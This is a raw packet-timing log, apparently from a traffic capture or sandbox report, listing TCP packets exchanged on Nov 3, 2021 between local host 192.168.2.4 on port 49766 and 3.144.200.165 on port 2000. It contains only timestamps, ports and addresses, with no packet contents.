Nov 3, 2021 14:44:40.953687906 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953712940 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.953723907 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953761101 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953777075 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.953798056 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953833103 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953844070 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.953867912 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953903913 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953939915 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.953942060 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953977108 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.953989983 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.954013109 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954049110 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954065084 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.954082012 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954118013 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954130888 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.954153061 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954188108 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954200983 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.954226017 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954261065 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954272032 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.954302073 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954339027 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954351902 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.954372883 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954408884 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954421997 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.954446077 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954482079 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954495907 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.954519987 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954554081 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954570055 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.954591036 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954627037 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954638958 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.954662085 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954699039 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954710960 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.954734087 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954796076 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.954797983 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954835892 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954870939 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954885960 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.954906940 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.954962015 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.954965115 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.955058098 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.955095053 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.955121040 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.955130100 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.955184937 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.087198973 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.087228060 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.087248087 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.087271929 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.087296963 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.087315083 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.087340117 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.089307070 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.089370012 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.089412928 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.095037937 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.095067978 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.095091105 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.095114946 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.095115900 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.095134974 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.095138073 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.095163107 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.095180988 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.095197916 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.095205069 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.095215082 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.095232010 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.095242023 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.095249891 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.095268011 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.095271111 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.095284939 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.095298052 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.095303059 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.095319986 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.095331907 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.095335960 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.095381021 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.097429037 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.097455978 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.097479105 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.097501993 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.097506046 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.097524881 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.097537041 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.097549915 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.097573042 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.097582102 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.097596884 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.097620010 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.097636938 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.097641945 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.097664118 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.097672939 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.097687960 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.097709894 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.097712994 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.097737074 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.097754955 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.097759962 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.097806931 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.103097916 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.103189945 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.103209019 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.103259087 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.103267908 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.103291035 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.103327036 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.103333950 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.103352070 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.103368044 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.103385925 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.103401899 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.103415966 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.103427887 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.103431940 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.103450060 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.103466988 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.103483915 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.103497982 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.103502035 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.103518963 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.103524923 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.103534937 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.103549957 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.103571892 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.104271889 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104304075 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104327917 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104351044 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104351044 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.104374886 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104399920 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104418993 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.104419947 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104437113 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104455948 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104456902 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.104474068 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104482889 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.104490042 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104507923 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104526043 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104537010 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.104542971 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104559898 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104577065 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104588985 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.104593039 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104610920 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104628086 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104629993 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.104644060 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104661942 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104669094 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.104679108 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104696989 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104703903 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.104713917 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104724884 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.104731083 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104748964 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104765892 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104774952 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.104795933 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104815006 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104832888 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104837894 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.104862928 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.104867935 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104880095 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.104892969 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104918957 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104940891 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104944944 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.104964972 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.104984999 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.104989052 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.105010033 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.105031967 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.105048895 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.105050087 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.105066061 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.105082035 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.105083942 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.105101109 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.105113983 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.105118990 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.105135918 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.105149031 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.105150938 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.105169058 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.105184078 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.105185986 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.105206966 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.105215073 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.105228901 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.105246067 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.105268002 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.105278969 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.105290890 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.105310917 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.105323076 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.105333090 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.105346918 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.105355024 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.105379105 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.105381012 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.105424881 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.235460997 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.235492945 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.235506058 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.235526085 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.235627890 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.235672951 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.237396002 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.237422943 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.237524986 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.243531942 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.243556976 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.243571043 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.243583918 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.243597031 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.243618965 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.243645906 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.243664026 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.243678093 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.243695021 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.243712902 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.243742943 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.243760109 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.243772984 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.243786097 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.243798018 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.243810892 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.243812084 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.243829012 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.243829966 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.243845940 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.243912935 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.243951082 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.245959997 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.245982885 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.245999098 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.246016026 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.246041059 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.246063948 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.246068954 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.246087074 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.246088982 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.246104002 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.246119976 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.246138096 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.246145964 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.246154070 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.246172905 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.246212006 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.246213913 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.246231079 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.246267080 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.246334076 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.246351957 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.246383905 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.251667976 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.251692057 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.251709938 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.251727104 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.251743078 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.251761913 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.251777887 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.251794100 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.251812935 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.251820087 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.251830101 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.251847029 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.251863956 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.251879930 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.251889944 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.251897097 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.251914024 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.251921892 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.251931906 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.251949072 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.251965046 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.251981020 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.251981974 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.252043962 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.254132986 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254257917 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254276037 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254290104 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254301071 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254317999 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254333019 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254348040 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254362106 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254371881 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.254378080 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254394054 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254410028 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254412889 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.254426003 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254442930 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254451990 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.254458904 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254475117 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254487038 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.254492044 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254508972 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254515886 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.254524946 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254539013 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254556894 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254565001 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.254573107 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254587889 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254602909 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254604101 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.254618883 CET	2000	49766	3.144.200.165	192.168.2.4
